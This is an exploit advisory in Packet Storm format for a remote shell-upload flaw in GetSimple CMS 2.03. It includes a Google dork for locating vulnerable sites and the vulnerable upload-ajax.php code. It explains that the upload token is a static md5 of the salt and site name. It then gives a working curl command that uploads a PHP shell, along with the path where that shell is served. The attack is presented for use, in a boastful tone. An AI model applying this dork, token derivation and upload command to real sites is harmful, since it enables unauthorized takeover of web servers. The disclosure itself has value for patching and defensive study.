GetSimple CMS 2.03 Shell Upload

2011-02-15T00:00:00
ID PACKETSTORM:98492
Type packetstorm
Reporter Chuzz
Modified 2011-02-15T00:00:00

Description

                                        
# Exploit Title: GetSimple CMS <=2.03 Remote Upload Shell (0day)  
# Google Dork: "powered by GetSimple Version 2.03"  
# Date: 15/FEB/2011  
# Author: s3rg3770 and Chuzz (irc.azzurra.org #hackerjournal)  
# Site Author: http://reflective.noblogs.org (OWL?)  
  
(\___/)  
(o\ /o)  
/|:.V.:|\  
\\::::://  
-----`"" ""`-----  
  
  
# Software Link: http://get-simple.info/  
# Version: 2.0.3  
# Tested on: *nix  
  
----------------------------------------------------------------------  
[INFO]  
  
What the fuck? A SESSIONHASH to upload a file? That's bacon security...  
  
The comparison below is the only gate in the snippet: no login or cookie check, just a match against $SESSIONHASH, which is a value fixed for the whole installation (see below). The file name only passes through clean_img_name(), which does not restrict the extension, so shell.php is written under data/uploads/ as-is.  
  
Bug Code:  
getsimple/admin/upload-ajax.php  
  
    // the "session" check: a static per-site value compared against a request parameter  
    if ($_REQUEST['sessionHash'] === $SESSIONHASH) {  
        if (!empty($_FILES)) {  
            $tempFile = $_FILES['Filedata']['tmp_name'];  
            // cleans the name, but does not restrict the extension  
            $name = clean_img_name($_FILES['Filedata']['name']);  
            $targetPath = GSDATAUPLOADPATH;  
            $targetFile = str_replace('//', '/', $targetPath) . $name;  
            move_uploaded_file($tempFile, $targetFile);  
            // ... (rest of the handler omitted)  
        }  
    }  
----------------------------------------------------------------------  
  
Generating SESSIONHASH: md5($salt . $sitename), a value fixed per installation and identical for every request and every visitor, so anyone who knows (or can derive) the salt and the site name holds a permanent upload token.  
[XPL]  
  
curl -F "Filedata=@yourshell.txt;filename=shell.php" \  
  "http://getsimple_localhost/admin/upload-ajax.php?sessionHash=<GENERATED_HASH>"  
  
Afterwards, enjoy your Bacon-Shell here: http://getsimple_localhost/data/uploads/shell.php  
  
Thanks to my ASCELL...  